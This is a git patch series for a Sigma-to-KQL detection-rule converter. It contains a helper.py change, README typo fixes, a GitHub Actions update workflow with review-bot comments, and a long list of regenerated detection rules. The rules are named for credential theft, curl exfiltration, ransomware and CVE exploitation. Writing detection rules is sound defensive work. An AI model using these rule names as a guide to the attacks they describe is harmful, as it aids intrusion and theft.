 kql_file.write(f'// Author: {yaml_contents.get("author", "")}\n')
 kql_file.write(f'// Date: {yaml_contents.get("date", "")}\n')
 kql_file.write(f'// Level: {yaml_contents.get("level", "")}\n')
- kql_file.write(f'// Description: {yaml_contents.get("description", "")}\n')
+
+ # Handle multi-line descriptions
+ description = yaml_contents.get("description", "")
+ if description:
+ # Split by newlines and comment each line
+ desc_lines = description.split('\n')
+ kql_file.write(f'// Description: {desc_lines[0]}\n')
+ for line in desc_lines[1:]:
+ if line.strip(): # Only write non-empty lines
+ kql_file.write(f'// {line}\n')
+
 kql_file.write(f'// MITRE Tactic: {TACTIC_FOLDER}\n')
 kql_file.write(f'// Tags: {", ".join(tags) if tags else ""}\n')
From 38cdce7f7d6eb43590deb86a64d42155f0caa6d8 Mon Sep 17 00:00:00 2001
From: Kaiber <89855993+Khadinxc@users.noreply.github.com>
Date: Sat, 15 Nov 2025 19:18:26 +1100
Subject: [PATCH 04/17] Update README.md Spelling mistake on Sentinel
---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 3a738095..31cc90d8 100644
--- a/README.md
+++ b/README.md
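Review bot: When `description` is empty, the new `if description:` branch in the helper.py hunk writes no `// Description:` line at all, whereas the removed line always emitted one, so the generated header loses a fixed field and anything that reads the header line by line now finds `// MITRE Tactic:` one line early. Splitting on `'\n'` also leaves a bare `\r` (or other line terminators) inside what is meant to be a single `//` comment line; `str.splitlines()` handles those, and since the description text comes from the upstream Sigma YAML, the per-physical-line `//` prefix is the only thing keeping that text inside a comment in the generated KQL. Whether `yaml_contents.get("description")` can be a non-string YAML value is not visible here, so the `str()` in the rewrite below is defensive rather than required. The enclosing function starts and ends outside the hunk.

```python
    # … unchanged: Author / Date / Level header lines …
    # Handle multi-line descriptions: one '//'-prefixed line per physical line,
    # always emitting the '// Description:' field even when the text is empty.
    description = str(yaml_contents.get("description", "") or "")
    desc_lines = [line for line in description.splitlines() if line.strip()] or [""]
    kql_file.write(f'// Description: {desc_lines[0]}\n')
    for line in desc_lines[1:]:
        kql_file.write(f'// {line}\n')
    # … unchanged: MITRE Tactic / Tags header lines …
```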
@@ -1,5 +1,5 @@ # Sigma2KQL - Working as of 15/11/2025 -Sigma Queries turned into KQL for Defender and Microsoft Snetinel using [pysigma-backend-KQL-backend](https://github.com/AttackIQ/pySigma-backend-kusto/tree/main) +Sigma Queries turned into KQL for Defender and Microsoft Sentinel using [pysigma-backend-KQL-backend](https://github.com/AttackIQ/pySigma-backend-kusto/tree/main) __Disclaimer: Not all of these rules have been validated either to ensure KQL is functional or if they are an exact replica of the Sigma rule. The script was created with the assumption that the pySigma Kusto backend does what it is meant to do.__ From 79178b22ee7113fd8977a1c0d19a1971ec08b0c2 Mon Sep 17 00:00:00 2001 From: Kaiber <89855993+Khadinxc@users.noreply.github.com> Date: Sat, 15 Nov 2025 19:19:22 +1100 Subject: [PATCH 05/17] Update README.md another spelling mistake --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 31cc90d8..ba769d7d 100644 --- a/README.md +++ b/README.md @@ -28,7 +28,7 @@ __Disclaimer: Not all of these rules have been validated either to ensure KQL is ## How do I use the helper to do this locally or in a Detection as Code pipeline? -I've included a pip freeze of required librararies and as per standard practice for Python development I suggest creating a virtual environment not to _break_ system wide package management. +I've included a pip freeze of required libraries and as per standard practice for Python development I suggest creating a virtual environment not to _break_ system wide package management. ### Run the following commands to get started: From d7e478938b20b623a045f5e682868d41486cc7bc Mon Sep 17 00:00:00 2001 
From: Kaiber_wsl_desktop Date: Sun, 16 Nov 2025 15:08:33 +1100 Subject: [PATCH 06/17] Added CI pipeline for automatic updates to repo --- .github/workflows/update-sigma-rules.yml | 84 ++++++++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 .github/workflows/update-sigma-rules.yml diff --git a/.github/workflows/update-sigma-rules.yml b/.github/workflows/update-sigma-rules.yml new file mode 100644 index 00000000..a5d02499 --- /dev/null +++ b/.github/workflows/update-sigma-rules.yml 
@@ -0,0 +1,84 @@
+name: Update Sigma to KQL Rules
+
+on:
+ schedule:
+ # Run daily at 2 AM UTC
+ - cron: '0 2 * * *'
+ workflow_dispatch:
+ # Allow manual trigger
+
+jobs:
+ convert-sigma-rules:
+ runs-on: ubuntu-latest
+
+ steps:
+ - name: Checkout Sigma2KQL repository
+ uses: actions/checkout@v4
+ with:
+ token: ${{ secrets.GITHUB_TOKEN }}
+ fetch-depth: 0
+
+ - name: Set up Python
+ uses: actions/setup-python@v5
+ with:
+ python-version: '3.11'
+ cache: 'pip'
+
+ - name: Clone Sigma rules repository
+ run: |
+ git clone https://github.com/SigmaHQ/sigma.git
+
+ - name: Install Python dependencies
+ run: |
+ pip install -r requirements.txt
+
+ - name: Run Sigma to KQL conversion
+ run: |
+ python helper.py --sigma-dir "./sigma" --output-dir "./KQL"
+
+ - name: Check for changes
+ id: check_changes
+ run: |
+ git diff --quiet KQL/ || echo "changes=true" >> $GITHUB_OUTPUT
+
+ - name: Create Pull Request
+ if: steps.check_changes.outputs.changes == 'true'
+ uses: peter-evans/create-pull-request@v6
+ with:
+ token: ${{ secrets.GITHUB_TOKEN }}
+ commit-message: 'chore: update KQL rules from latest Sigma rules'
+ branch: update-sigma-rules-${{ github.run_number }}
+ delete-branch: true
+ title: 'Update KQL Rules from Sigma Repository'
+ body: |
+ ## Automated Sigma to KQL Conversion
+
+ This PR contains updated KQL rules converted from the latest Sigma rules repository.
+
+ ### Changes
+ - Updated KQL rules from SigmaHQ/sigma repository
+ - Conversion date: ${{ github.event.repository.updated_at }}
+ - Workflow run: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}
+
+ ### Review Checklist
+ - [ ] Review changed rules for accuracy
+ - [ ] Verify new rules are properly formatted
+ - [ ] Check for any failed conversions in workflow logs
+
+ ---
+ *This PR was automatically created by the Update Sigma Rules workflow.*
+ labels: |
+ automated
+ sigma-update
+ reviewers: ${{ github.repository_owner }}
+
+ - name: Summary
+ if: steps.check_changes.outputs.changes == 'true'
+ run: |
+ echo "✅ Pull request created with updated Sigma rules"
+ echo "📊 Check the PR for detailed changes"
+
+ - name: No changes summary
+ if: steps.check_changes.outputs.changes != 'true'
+ run: |
+ echo "ℹ️ No changes detected - rules are up to date"
From f8e3b357f3dffed150e54f849c2c40d961132e57 Mon Sep 17 00:00:00 2001
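Review bot: The workflow declares no top-level `permissions:` block and references all three actions by floating major tags (`actions/checkout@v4`, `actions/setup-python@v5`, `peter-evans/create-pull-request@v6`), so this scheduled job runs with the repository's default `GITHUB_TOKEN` scope and with whatever those tags resolve to on the day; declare `permissions:` with `contents: write` and `pull-requests: write` (the minimum the PR step needs) and pin each action to a full commit SHA. The `git clone https://github.com/SigmaHQ/sigma.git` step tracks the upstream default branch with no tag or commit pin, so any upstream change is converted and proposed with the PR review as the only gate; pin a release tag, or at least record the converted upstream commit (`git -C sigma rev-parse HEAD`) in the PR body instead of `github.event.repository.updated_at`, which describes this repository rather than Sigma and may not be populated on a `schedule` trigger. In the change check, `git diff --quiet KQL/` ignores untracked files, so a run whose only effect is newly created rule files never sets `changes=true` and skips the PR; stage `KQL/` first and compare the index. The Sigma clone also lands inside the checked-out workspace, and if the create-pull-request step is left at its default of committing every new and modified file it would sweep the `sigma/` checkout into the PR; clone into `${{ runner.temp }}` and restrict the action with `add-paths: KQL/`.
```yaml
permissions:
  contents: write
  pull-requests: write

# … unchanged: on:, jobs:, checkout and setup-python steps …

      - name: Clone Sigma rules repository
        run: |
          git clone https://github.com/SigmaHQ/sigma.git "${{ runner.temp }}/sigma"

# … unchanged: dependency install …

      - name: Run Sigma to KQL conversion
        run: |
          python helper.py --sigma-dir "${{ runner.temp }}/sigma" --output-dir "./KQL"

      - name: Check for changes
        id: check_changes
        run: |
          git add -A KQL/
          git diff --cached --quiet -- KQL/ || echo "changes=true" >> "$GITHUB_OUTPUT"

      - name: Create Pull Request
        if: steps.check_changes.outputs.changes == 'true'
        uses: peter-evans/create-pull-request@v6   # pin to a full commit SHA
        with:
          add-paths: KQL/
# … unchanged: remaining create-pull-request inputs and summary steps …
```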
From: Khadinxc <89855993+Khadinxc@users.noreply.github.com> Date: Sun, 16 Nov 2025 04:10:14 +0000 Subject: [PATCH 07/17] chore: update KQL rules from latest Sigma rules --- .../apt31_judgement_panda_activity.kql | 22 +++++----- .../conti_ntds_exfiltration_command.kql | 18 ++++---- ...e_database_dumping_activity_via_sqlcmd.kql | 18 ++++---- ..._exe_file_creation_by_uncommon_process.kql | 24 +++++----- .../pandemic_registry_key.kql | 18 ++++---- ...cxdesktopapp_beaconing_activity_netcon.kql | 22 +++++----- ...eamer_rat_loading_net_executable_image.kql | 18 ++++---- ...ulnerability_cve_2025_33053_image_load.kql | 22 +++++----- .../potential_pikabot_c2_activity.kql | 24 +++++----- ...picious_child_process_of_3cxdesktopapp.kql | 18 ++++---- .../Credential Access/gallium_iocs.kql | 18 ++++---- ..._russian_apt_credential_theft_activity.kql | 22 +++++----- ..._file_potential_cve_2025_24054_exploit.kql | 26 +++++------ ...ishing_campaign_commandline_indicators.kql | 22 +++++----- ...2018_phishing_campaign_file_indicators.kql | 22 +++++----- .../apt_privatelog_image_load_pattern.kql | 22 +++++----- .../blue_mockingbird_registry.kql | 18 ++++---- ...d_sleet_apt_dll_sideloading_indicators.kql | 22 +++++----- ...t_apt_scheduled_task_creation_registry.kql | 18 ++++---- ...ed_by_svr_for_graphicalproton_backdoor.kql | 18 ++++---- ...ation_group_dll_u_export_function_load.kql | 22 +++++----- ...lden_chickens_deployment_via_ocx_files.kql | 18 ++++---- .../exploit_for_cve_2015_1641.kql | 18 ++++---- .../flowcloud_registry_markers.kql | 24 +++++----- ...st_blizzard_apt_file_creation_activity.kql | 24 +++++----- ...t_javascript_constrained_file_creation.kql | 24 +++++----- ...blizzard_apt_process_creation_activity.kql | 20 ++++----- ...ingle_digit_dll_execution_via_rundll32.kql | 18 ++++---- ...ka_backdoor_execution_via_rundll32_exe.kql | 18 ++++---- .../lazarus_apt_dll_sideloading_activity.kql | 22 +++++----- .../lazarus_system_binary_masquerading.kql | 22 +++++----- 
..._dll_load_by_compromised_3cxdesktopapp.kql | 22 +++++----- .../notpetya_ransomware_activity.kql | 18 ++++---- ...l_extension_execution_via_rundll32_exe.kql | 18 ++++---- ...ushroom_dll_load_activity_via_regsvr32.kql | 18 ++++---- ...al_compromised_3cxdesktopapp_execution.kql | 22 +++++----- ...promised_3cxdesktopapp_update_activity.kql | 18 ++++---- ...tial_devil_bait_malware_reconnaissance.kql | 22 +++++----- ...potential_devil_bait_related_indicator.kql | 22 +++++----- .../potential_dridex_activity.kql | 22 +++++----- .../potential_emotet_rundll32_execution.kql | 18 ++++---- .../potential_empiremonkey_activity.kql | 22 +++++----- ...guineapig_goolgeupdate_process_anomaly.kql | 18 ++++---- ...al_kapeka_decrypted_backdoor_indicator.kql | 20 ++++----- ...ial_ke3chang_tidepool_malware_activity.kql | 18 ++++---- .../potential_muddywater_apt_activity.kql | 22 +++++----- ...cious_command_combinations_via_cmd_exe.kql | 22 +++++----- .../potential_qakbot_rundll32_execution.kql | 22 +++++----- ...raspberry_robin_cpl_execution_activity.kql | 20 ++++----- .../ps_exe_renamed_sysinternals_tool.kql | 22 +++++----- .../qakbot_regsvr32_calc_pattern.kql | 22 +++++----- .../qakbot_rundll32_exports_execution.kql | 22 +++++----- ..._rundll32_fake_dll_extension_execution.kql | 22 +++++----- ...stealer_module_launch_via_rundll32_exe.kql | 18 ++++---- ...t_slashandgrab_exploitation_indicators.kql | 18 ++++---- ..._sieve_malware_file_indicator_creation.kql | 22 +++++----- .../sofacy_trojan_loader_activity.kql | 18 ++++---- ...do_privilege_escalation_cve_2019_14287.kql | 22 +++++----- ...ous_razerinstaller_explorer_subprocess.kql | 22 +++++----- ...ue_of_msdt_in_registry_cve_2022_30190_.kql | 18 ++++---- ...mpressed_files_from_temp_sh_using_wget.kql | 18 ++++---- ...file_from_untrusted_direct_ip_via_wget.kql | 18 ++++---- ...l_certificate_exfiltration_via_openssl.kql | 18 ++++---- .../potential_pikabot_discovery_activity.kql | 24 +++++----- .../Execution/adwind_rat_jrat.kql | 18 
++++---- ..._spooler_exploitation_filename_pattern.kql | 18 ++++---- .../cve_2021_26858_exchange_exploitation.kql | 22 +++++----- ...ve_2021_44077_poc_default_dropped_file.kql | 22 +++++----- ...22_24527_microsoft_connected_cache_lpe.kql | 18 ++++---- ...icious_confluence_child_process_linux_.kql | 22 +++++----- ...ious_confluence_child_process_windows_.kql | 18 ++++---- ...tempt_suspicious_double_extension_file.kql | 18 ++++---- ...ttempt_suspicious_winrar_child_process.kql | 22 +++++----- ...tential_exploitation_rev_file_creation.kql | 22 +++++----- ...kgate_autoit3_exe_execution_parameters.kql | 26 +++++------ ...op_darkgate_loader_in_c_temp_directory.kql | 22 +++++----- .../Execution/darkside_ransomware_pattern.kql | 22 +++++----- ...ond_sleet_apt_file_creation_indicators.kql | 22 +++++----- ..._sleet_apt_process_activity_indicators.kql | 22 +++++----- .../droppers_exploiting_cve_2017_11882.kql | 18 ++++---- .../Execution/elise_backdoor_activity.kql | 22 +++++----- .../emotet_loader_execution_via_lnk_file.kql | 24 +++++----- .../Execution/exploit_for_cve_2017_0261.kql | 22 +++++----- .../Execution/exploit_for_cve_2017_8759.kql | 18 ++++---- ...25_59287_wsus_suspicious_child_process.kql | 24 +++++----- ...e_2020_1472_execution_of_zerologon_poc.kql | 18 ++++---- .../fakeupdates_socgholish_activity.kql | 22 +++++----- .../file_creation_related_to_rat_clients.kql | 22 +++++----- .../Execution/fireball_archer_install.kql | 18 ++++---- .../goofy_guineapig_backdoor_ioc.kql | 22 +++++----- .../greenbug_espionage_group_indicators.kql | 22 +++++----- .../griffon_malware_attack_pattern.kql | 22 +++++----- .../hermetic_wiper_tg_process_patterns.kql | 18 ++++---- ...ackdoor_curl_tor_socks_proxy_execution.kql | 22 +++++----- ...apeka_backdoor_loaded_via_rundll32_exe.kql | 20 ++++----- .../Execution/katz_stealer_dll_loaded.kql | 26 +++++------ .../lace_tempest_cobalt_strike_download.kql | 22 +++++----- .../lace_tempest_file_indicators.kql | 22 +++++----- 
.../lace_tempest_malware_loader_execution.kql | 22 +++++----- .../Execution/lazarus_group_activity.kql | 22 +++++----- .../macos_filegrabber_infostealer.kql | 18 ++++---- .../Execution/mercury_apt_activity.kql | 18 ++++---- ...erafaspex_suspicious_process_execution.kql | 22 +++++----- ...storm_log4j_wstomcat_process_execution.kql | 18 ++++---- ...ageengine_suspicious_process_execution.kql | 22 +++++----- ...nyx_sleet_apt_file_creation_indicators.kql | 22 +++++----- ..._mf_ng_exploitation_related_indicators.kql | 22 +++++----- .../papercut_mf_ng_potential_exploitation.kql | 22 +++++----- ...dstorm_apt_process_activity_indicators.kql | 22 +++++----- .../potential_apt10_cloud_hopper_activity.kql | 22 +++++----- ...tential_apt_fin7_exploitation_activity.kql | 24 +++++----- ...nnaissance_powertrash_related_activity.kql | 22 +++++----- ...fin7_related_powershell_script_created.kql | 18 ++++---- ..._panda_activity_against_australian_gov.kql | 22 +++++----- .../potential_baby_shark_malware_activity.kql | 18 ++++---- ...otential_blackbyte_ransomware_activity.kql | 18 ++++---- ...al_cve_2021_26857_exploitation_attempt.kql | 18 ++++---- ...al_cve_2021_40444_exploitation_attempt.kql | 18 ++++---- ...space_one_access_remote_code_execution.kql | 24 +++++----- ...al_cve_2022_29072_exploitation_attempt.kql | 22 +++++----- ..._exploitation_fake_wermgr_exe_creation.kql | 18 ++++---- ...874_exploitation_fake_wermgr_execution.kql | 22 +++++----- ...loitation_uncommon_report_wer_location.kql | 18 ++++---- ...ect_os_command_injection_file_creation.kql | 24 +++++----- .../Execution/potential_emotet_activity.kql | 22 +++++----- ...tation_attempt_from_office_application.kql | 18 ++++---- ...2024_3094_suspicious_ssh_child_process.kql | 22 +++++----- ...uspicious_creation_of_esx_admins_group.kql | 22 +++++----- ...tial_goofy_guineapig_backdoor_activity.kql | 22 +++++----- ...kabot_activity_lure_document_execution.kql | 20 ++++----- .../potential_maze_ransomware_activity.kql | 22 +++++----- 
...tation_dynamic_compilation_via_csc_exe.kql | 28 ++++++------ .../Execution/potential_qbot_activity.kql | 22 +++++----- ...ential_raspberry_robin_dot_ending_file.kql | 18 ++++---- ...ential_sap_netweaver_webshell_creation.kql | 24 +++++----- ..._sap_netweaver_webshell_creation_linux.kql | 24 +++++----- ..._malware_installation_binary_indicator.kql | 22 +++++----- ...e_installation_cli_arguments_indicator.kql | 22 +++++----- ..._malware_persistence_service_execution.kql | 18 ++++---- .../potential_snatch_ransomware_activity.kql | 22 +++++----- .../printernightmare_mimikatz_driver_name.kql | 22 +++++----- .../qakbot_uninstaller_execution.kql | 22 +++++----- ..._initial_execution_from_external_drive.kql | 22 +++++----- ...robin_subsequent_execution_of_commands.kql | 22 +++++----- ...revil_kaseya_incident_malware_patterns.kql | 18 ++++---- ...orschach_ransomware_execution_activity.kql | 22 +++++----- ...nake_malware_installer_name_indicators.kql | 22 +++++----- ...e_malware_kernel_driver_file_indicator.kql | 22 +++++----- ...are_werfault_persistence_file_creation.kql | 18 ++++---- .../Execution/trickbot_malware_activity.kql | 18 ++++---- .../tropictrooper_campaign_november_2018.kql | 18 ++++---- .../turla_group_lateral_movement.kql | 18 ++++---- .../Execution/unc2452_powershell_pattern.kql | 22 +++++----- .../unc2452_process_creation_patterns.kql | 18 ++++---- ..._barracuda_esg_exploitation_indicators.kql | 22 +++++----- ...nc4841_email_exfiltration_file_pattern.kql | 18 ++++---- .../unc4841_potential_seaspy_execution.kql | 22 +++++----- ...snif_redirection_of_discovery_commands.kql | 22 +++++----- .../Execution/zxshell_malware.kql | 22 +++++----- ...ackage_malicious_exfiltration_via_curl.kql | 22 +++++----- .../funklocker_ransomware_file_creation.kql | 22 +++++----- .../Impact/lockergoga_ransomware_activity.kql | 22 +++++----- .../potential_conti_ransomware_activity.kql | 22 +++++----- .../Impact/potential_dtrack_rat_activity.kql | 22 +++++----- 
...hell_command_injection_processcreation.kql | 22 +++++----- .../atlassian_confluence_cve_2022_26134.kql | 18 ++++---- ..._authentication_bypass_cve_2025_57791_.kql | 20 ++++----- ...cve_2021_31979_cve_2021_33771_exploits.kql | 22 +++++----- ...979_cve_2021_33771_exploits_by_sourgum.kql | 22 +++++----- ...e_2024_50623_exploitation_attempt_cleo.kql | 22 +++++----- .../Initial Access/dns_rce_cve_2020_1350.kql | 22 +++++----- ...oited_cve_2020_10189_zoho_manageengine.kql | 18 ++++---- ...ce_cve_2021_26084_exploitation_attempt.kql | 18 ++++---- ...28_exploitation_attempt_vmware_horizon.kql | 22 +++++----- ...al_cve_2022_26809_exploitation_attempt.kql | 22 +++++----- ...empt_of_undocumented_windowsserver_rce.kql | 18 ++++---- ...tation_of_goanywhere_mft_vulnerability.kql | 24 +++++----- ...ve_2025_53770_exploitation_file_create.kql | 20 ++++----- ...cve_2025_53770_exploitation_indicators.kql | 20 ++++----- .../suspicious_crushftp_child_process.kql | 28 ++++++------ .../wannacry_ransomware_activity.kql | 18 ++++---- .../blackbyte_ransomware_registry.kql | 22 +++++----- .../Persistence/blue_mockingbird.kql | 18 ++++---- ...l_rat_anonymous_user_process_execution.kql | 18 ++++---- ...oldsteel_rat_cleanup_command_execution.kql | 22 +++++----- ...teel_rat_service_persistence_execution.kql | 22 +++++----- ...raversal_webshell_drop_cve_2025_57790_.kql | 20 ++++----- ..._suspicious_new_printer_ports_registry.kql | 24 +++++----- ...eenconnect_path_traversal_exploitation.kql | 22 +++++----- .../darkgate_user_created_via_net_exe.kql | 22 +++++----- ...oiting_setupcomplete_cmd_cve_2019_1378.kql | 18 ++++---- ...eka_backdoor_configuration_persistence.kql | 20 ++++----- .../moriya_rootkit_file_created.kql | 18 ++++---- .../oceanlotus_registry_activity.kql | 18 ++++---- .../outlook_task_note_reminder_received.kql | 22 +++++----- .../potential_bearlpe_exploitation.kql | 18 ++++---- ...steel_persistence_service_dll_creation.kql | 18 ++++---- ...coldsteel_persistence_service_dll_load.kql 
| 22 +++++----- ...otential_coldsteel_rat_file_indicators.kql | 18 ++++---- ...al_coldsteel_rat_windows_user_creation.kql | 18 ++++---- ...on_hta_file_creation_by_foxitpdfreader.kql | 18 ++++---- ...e_2023_36884_exploitation_dropped_file.kql | 18 ++++---- ...registry_blob_related_to_snake_malware.kql | 22 +++++----- ...tivity_shutdown_schedule_task_creation.kql | 20 ++++----- ...otential_netwire_rat_activity_registry.kql | 18 ++++---- ...al_notepad_cve_2025_49144_exploitation.kql | 22 +++++----- ...al_printnightmare_exploitation_attempt.kql | 18 ++++---- ...registry_set_internet_settings_zonemap.kql | 20 ++++----- ...ntial_ursnif_malware_activity_registry.kql | 18 ++++---- ...reenconnect_user_database_modification.kql | 24 +++++----- ...xploitation_cve_2021_35211_by_dev_0322.kql | 22 +++++----- ...lud_malicious_github_workflow_creation.kql | 22 +++++----- ...all_sieve_malware_registry_persistence.kql | 22 +++++----- ...nake_malware_covert_store_registry_key.kql | 18 ++++---- .../Persistence/sourgum_actor_behaviours.kql | 18 ++++---- ...s_printerports_creation_cve_2020_1048_.kql | 22 +++++----- ..._spawned_by_centrestack_portal_apppool.kql | 22 +++++----- ...spooler_service_suspicious_binary_load.kql | 22 +++++----- .../apt27_emissary_panda_activity.kql | 22 +++++----- .../chromeloader_malware_execution.kql | 22 +++++----- ...user_and_guid_password_cve_2025_57788_.kql | 24 +++++----- .../defrag_deactivation.kql | 18 ++++---- .../exploiting_cve_2019_1388.kql | 18 ++++---- ...d_apt_custom_protocol_handler_creation.kql | 24 +++++----- ...stom_protocol_handler_dll_registry_set.kql | 24 +++++----- ...hafnium_exchange_exploitation_activity.kql | 22 +++++----- ...ss_spawning_rundll32_guloader_activity.kql | 24 +++++----- ...r_lpe_cve_2021_41379_file_create_event.kql | 22 +++++----- .../kapeka_backdoor_autorun_persistence.kql | 18 ++++---- .../kapeka_backdoor_persistence_activity.kql | 30 ++++++------- .../leviathan_registry_key_activity.kql | 18 ++++---- 
...vity_execution_of_more_com_and_vbc_exe.kql | 22 +++++----- ..._potential_cve_2025_32463_exploitation.kql | 28 ++++++------ .../oilrig_apt_activity.kql | 22 +++++----- .../oilrig_apt_registry_persistence.kql | 22 +++++----- .../operation_wocao_activity.kql | 22 +++++----- .../pingback_backdoor_activity.kql | 22 +++++----- ...pingback_backdoor_dll_loading_activity.kql | 22 +++++----- .../pingback_backdoor_file_indicators.kql | 22 +++++----- ...otential_actinium_persistence_activity.kql | 22 +++++----- ...al_cve_2021_41379_exploitation_attempt.kql | 18 ++++---- ...ve_2023_21554_queuejumper_exploitation.kql | 18 ++++---- ...l_cve_2024_35250_exploitation_activity.kql | 24 +++++----- ...hftp_rce_vulnerability_cve_2025_54309_.kql | 22 +++++----- ...ot_activity_winlogon_shell_persistence.kql | 22 +++++----- .../potential_pikabot_hollowing_activity.kql | 24 +++++----- .../potential_plugx_activity.kql | 18 ++++---- .../potential_ryuk_ransomware_activity.kql | 22 +++++----- ...l_systemnightmare_exploitation_attempt.kql | 18 ++++---- ...r_payload_execution_via_scheduled_task.kql | 26 +++++------ ...ll_sieve_malware_commandline_indicator.kql | 22 +++++----- .../suspicious_sysmon_as_execution_parent.kql | 18 ++++---- .../suspicious_vbscript_un2452_pattern.kql | 18 ++++---- .../taidoor_rat_dll_load.kql | 18 ++++---- .../turla_group_commands_may_2020.kql | 18 ++++---- .../winnti_malware_hk_university_campaign.kql | 22 +++++----- .../winnti_pipemon_characteristics.kql | 22 +++++----- .../conti_volume_shadow_listing.kql | 18 ++++---- .../foggyweb_backdoor_dll_loading.kql | 22 +++++----- .../formbook_process_creation.kql | 18 ++++---- .../mustang_panda_dropper.kql | 22 +++++----- ...ous_word_cab_file_write_cve_2021_40444.kql | 18 ++++---- .../clipboard_data_collection_via_pbpaste.kql | 30 ++++++------- ...ed_compressed_file_extraction_via_7zip.kql | 22 +++++----- ...suspicious_compression_tool_parameters.kql | 18 ++++---- .../Collection/system_drawing_dll_load.kql | 22 +++++----- 
.../curl_exe_execution.kql | 24 +++++----- ...rl_exe_execution_with_custom_useragent.kql | 24 +++++----- .../file_download_via_curl_exe.kql | 26 +++++------ ...ion_initiated_from_users_public_folder.kql | 26 +++++------ ...suspicious_azure_front_door_connection.kql | 26 +++++------ ...ary_code_execution_and_remote_sessions.kql | 38 ++++++++-------- ...e_code_tunnel_execution_file_indicator.kql | 22 +++++----- ...dential_files_by_uncommon_applications.kql | 32 +++++++------- ...nsitive_files_by_uncommon_applications.kql | 30 ++++++------- ...vol_policies_share_by_uncommon_process.kql | 18 ++++---- ..._loaded_by_uncommon_suspicious_process.kql | 28 ++++++------ ...og_query_requests_by_builtin_utilities.kql | 22 +++++----- .../Credential Access/pfx_file_creation.kql | 44 +++++++++---------- ...assword_reconnaissance_via_findstr_exe.kql | 18 ++++---- .../unattend_xml_file_access_attempt.kql | 20 ++++----- ...eg_hive_files_by_uncommon_applications.kql | 22 +++++----- ...ok_mail_files_by_uncommon_applications.kql | 32 +++++++------- .../ads_zone_identifier_deleted.kql | 22 +++++----- .../amsi_dll_load_by_uncommon_process.kql | 22 +++++----- ...tsproxy_dll_loaded_by_uncommon_process.kql | 24 +++++----- .../codepage_modification_via_mode_com.kql | 20 ++++----- .../diskshadow_child_process_spawned.kql | 22 +++++----- .../diskshadow_script_mode_execution.kql | 22 +++++----- .../dll_call_by_ordinal_via_rundll32_exe.kql | 24 +++++----- ...ork_connection_to_non_local_ip_address.kql | 26 +++++------ .../dmp_hdmp_file_creation.kql | 22 +++++----- ...ic_net_compilation_via_csc_exe_hunting.kql | 22 +++++----- ...le_or_folder_permissions_modifications.kql | 24 +++++----- ...dless_process_launched_via_conhost_exe.kql | 20 ++++----- ..._exe_initiated_http_network_connection.kql | 22 +++++----- ..._the_cryptography_powershell_namespace.kql | 26 +++++------ ...rosoft_office_trusted_location_updated.kql | 22 +++++----- .../microsoft_workflow_compiler_execution.kql | 22 +++++----- 
...initiated_network_connection_over_http.kql | 26 +++++------ ...cting_package_created_via_iexpress_exe.kql | 26 +++++------ ...e_added_via_new_netfirewallrule_cmdlet.kql | 22 +++++----- ...e_obfuscation_using_unicode_characters.kql | 20 ++++----- ...sideloading_activity_via_extexport_exe.kql | 22 +++++----- ...on_via_explorer_exe_from_shell_process.kql | 28 ++++++------ ..._execution_from_guid_like_folder_names.kql | 24 +++++----- ..._the_cryptography_powershell_namespace.kql | 26 +++++------ ...isterserver_export_function_explicitly.kql | 24 +++++----- ...rvice_binary_in_user_controlled_folder.kql | 24 +++++----- ...files_as_system_files_using_attrib_exe.kql | 18 ++++---- .../terminate_linux_process_via_kill.kql | 18 ++++---- .../use_short_name_path_in_command_line.kql | 34 +++++++------- ..._file_creation_in_codeintegrity_folder.kql | 22 +++++----- .../Discovery/cmd_shell_output_redirect.kql | 24 +++++----- .../Discovery/net_exe_execution.kql | 22 +++++----- .../Discovery/process_discovery.kql | 24 +++++----- .../Discovery/sc_exe_query_execution.kql | 24 +++++----- .../suspicious_tasklist_discovery_command.kql | 22 +++++----- ...tem_information_discovery_via_wmic_exe.kql | 26 +++++------ .../arbitrary_command_execution_using_wsl.kql | 24 +++++----- .../cab_file_extraction_via_wusa_exe.kql | 22 +++++----- ...ment_execution_dfsvc_exe_child_process.kql | 22 +++++----- ...d_executed_via_run_dialog_box_registry.kql | 24 +++++----- ...xe_network_connection_to_non_local_ips.kql | 22 +++++----- ..._new_module_via_powershell_commandline.kql | 22 +++++----- ..._of_script_inside_of_a_compressed_file.kql | 32 +++++++------- .../microsoft_excel_add_in_loaded.kql | 22 +++++----- .../microsoft_word_add_in_loaded.kql | 22 +++++----- ...ection_initiated_by_powershell_process.kql | 30 ++++++------- ...tware_execution_uc_berkeley_signature_.kql | 24 +++++----- ...l_file_override_append_via_set_command.kql | 28 ++++++------ ..._suspicious_powershell_child_processes.kql | 24 
+++++----- .../process_execution_from_webdav_share.kql | 28 ++++++------ ...path_configuration_file_creation_linux.kql | 26 +++++------ ...path_configuration_file_creation_macos.kql | 26 +++++------ ...th_configuration_file_creation_windows.kql | 26 +++++------ ...access_tool_ammy_admin_agent_execution.kql | 22 +++++----- ...s_tool_cmd_exe_execution_via_anyviewer.kql | 22 +++++----- ...nnect_remote_command_execution_hunting.kql | 24 +++++----- .../scheduled_task_created_filecreation.kql | 22 +++++----- .../scheduled_task_created_registry.kql | 22 +++++----- ...m_potential_suspicious_parent_location.kql | 24 +++++----- ...s_new_instance_of_an_office_com_object.kql | 24 +++++----- .../unusually_long_powershell_commandline.kql | 18 ++++---- .../wmi_module_loaded_by_uncommon_process.kql | 18 ++++---- ...vbe_file_execution_via_cscript_wscript.kql | 22 +++++----- ...connection_open_attempt_via_winscp_cli.kql | 18 ++++---- ...tential_data_exfiltration_via_curl_exe.kql | 22 +++++----- .../Exfiltration/tunneling_tool_execution.kql | 22 +++++----- ...scp_execution_from_non_standard_folder.kql | 18 ++++---- .../process_terminated_via_taskkill.kql | 24 +++++----- .../webdav_temporary_local_file_creation.kql | 22 +++++----- .../smb_over_quic_via_net_exe.kql | 22 +++++----- .../execution_from_webserver_root_folder.kql | 24 +++++----- .../shell_context_menu_command_tampering.kql | 22 +++++----- ...ted_in_potentially_suspicious_location.kql | 26 +++++------ .../elevated_system_shell_spawned.kql | 18 ++++---- ...tion_of_an_executable_by_an_executable.kql | 26 +++++------ .../7zip_compressing_dump_files.kql | 24 +++++----- ...kerberos_coercion_via_dns_spn_spoofing.kql | 30 ++++++------- .../audio_capture_via_powershell.kql | 22 +++++----- 